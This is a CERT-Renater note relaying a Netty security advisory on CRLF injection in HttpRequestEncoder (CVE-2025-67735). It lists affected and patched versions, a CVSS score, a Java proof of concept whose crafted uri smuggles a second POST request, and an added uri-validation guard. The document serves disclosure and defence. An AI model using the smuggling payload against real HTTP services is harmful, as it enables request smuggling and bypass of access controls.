=====================================================================

                            CERT-Renater

                Information Note No. 2025/VULN859
_____________________________________________________________________

DATE                : 16/12/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running io.netty:netty-codec-http (maven)
                      versions prior to 4.2.8.Final, 4.1.129.Final.

=====================================================================
https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4
_____________________________________________________________________


CRLF injection vulnerability in io.netty.handler.codec.http.HttpRequestEncoder
Moderate
normanmaurer published GHSA-84h7-rjj3-6jx4 Dec 15, 2025

Package
io.netty:netty-codec-http (Maven)

Affected versions
<= 4.2.7.Final, <= 4.1.128.Final

Patched versions
>= 4.2.8.Final, >= 4.1.129.Final


Description

Summary

io.netty.handler.codec.http.HttpRequestEncoder is vulnerable to CRLF
injection through the request uri when constructing a request. This
leads to request smuggling when HttpRequestEncoder is used without
proper sanitization of the uri.


Details

The HttpRequestEncoder simply UTF-8 encodes the uri without
sanitization:

  buf.writeByte(SP).writeCharSequence(uriCharSequence, CharsetUtil.UTF_8);

The default implementation of HTTP headers already guards against this
with a validator, which makes the same injection impossible through
headers.


PoC

Simple reproducer:

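import io.netty.buffer.ByteBuf;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.ChannelInboundHandlerAdapter;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.DefaultHttpRequest;
import io.netty.handler.codec.http.HttpClientCodec;
import io.netty.handler.codec.http.HttpMethod;
import io.netty.handler.codec.http.HttpServerCodec;
import io.netty.handler.codec.http.HttpVersion;

// Wrapper class name is arbitrary; the advisory only gives the main method.
public class Reproducer {
  public static void main(String[] args) {

    // Client side: encodes the outgoing request with HttpRequestEncoder.
    EmbeddedChannel client = new EmbeddedChannel();
    client.pipeline().addLast(new HttpClientCodec());

    // Server side: decodes the bytes and prints every message it parses.
    EmbeddedChannel server = new EmbeddedChannel();
    server.pipeline().addLast(new HttpServerCodec());
    server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
      @Override
      public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
        System.out.println("Processing msg " + msg);
      }
    });

    // A single request object whose uri carries CRLF sequences.
    DefaultHttpRequest request = new DefaultHttpRequest(
      HttpVersion.HTTP_1_1,
      HttpMethod.GET,
      "/s1 HTTP/1.1\r\n" +
        "\r\n" +
        "POST /s2 HTTP/1.1\r\n" +
        "content-length: 11\r\n\r\n" +
        "Hello World" +
        "GET /s1"
    );
    client.writeAndFlush(request);

    // Feed the encoded bytes to the server pipeline.
    ByteBuf tmp;
    while ((tmp = client.readOutbound()) != null) {
      server.writeInbound(tmp);
    }
  }
}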

Impact

Any application or framework using HttpRequestEncoder can be abused
to perform request smuggling through CRLF injection.
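
A caller-side check on the request uri, run before the value is handed to DefaultHttpRequest, is shown below as an added example. It is not Netty code and not the project's fix; the class and method names are hypothetical, and the rule it applies (reject control characters, space and DEL) is an assumption about what a request-line guard should refuse.

```java
import java.util.List;

// Added example, JDK only. Intended use (assumption):
//   new DefaultHttpRequest(HTTP_1_1, GET, RequestTargetGuard.requireSafe(uri))
public final class RequestTargetGuard {

    private RequestTargetGuard() {}

    /**
     * Index of the first character that must not appear raw on an HTTP/1.1
     * request line (control characters including CR and LF, space, DEL),
     * or -1 when the value contains none of them.
     */
    static int firstUnsafeIndex(CharSequence uri) {
        for (int i = 0; i < uri.length(); i++) {
            char c = uri.charAt(i);
            if (c <= 0x20 || c == 0x7f) {
                return i;
            }
        }
        return -1;
    }

    /** Throws instead of letting an unsafe uri reach the encoder. */
    static String requireSafe(String uri) {
        if (uri == null || uri.isEmpty()) {
            throw new IllegalArgumentException("empty request uri");
        }
        int idx = firstUnsafeIndex(uri);
        if (idx >= 0) {
            throw new IllegalArgumentException(String.format(
                "illegal character 0x%02x at index %d in request uri",
                (int) uri.charAt(idx), idx));
        }
        return uri;
    }

    public static void main(String[] args) {
        // Constructed inputs: an ordinary uri and the uri from the reproducer.
        List<String> samples = List.of(
            "/s1?q=a%20b",
            "/s1 HTTP/1.1\r\n\r\nPOST /s2 HTTP/1.1\r\ncontent-length: 11\r\n\r\nHello WorldGET /s1");
        for (String uri : samples) {
            try {
                System.out.println("accepted: " + requireSafe(uri));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Spaces and control characters that belong in a path or query have to be percent-encoded before the check, as in the first sample.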


Contribution

I am available to discuss and contribute fixes.


Severity
Moderate, 6.5 / 10

CVSS v3 base metrics
Attack vector       : Network
Attack complexity   : Low
Privileges required : None
User interaction    : None
Scope               : Unchanged
Confidentiality     : Low
Integrity           : Low
Availability        : None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE ID
CVE-2025-67735

Weaknesses
CWE-93

Credits

    @vietj (Coordinator)
    @nakyamad (Reporter)


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================




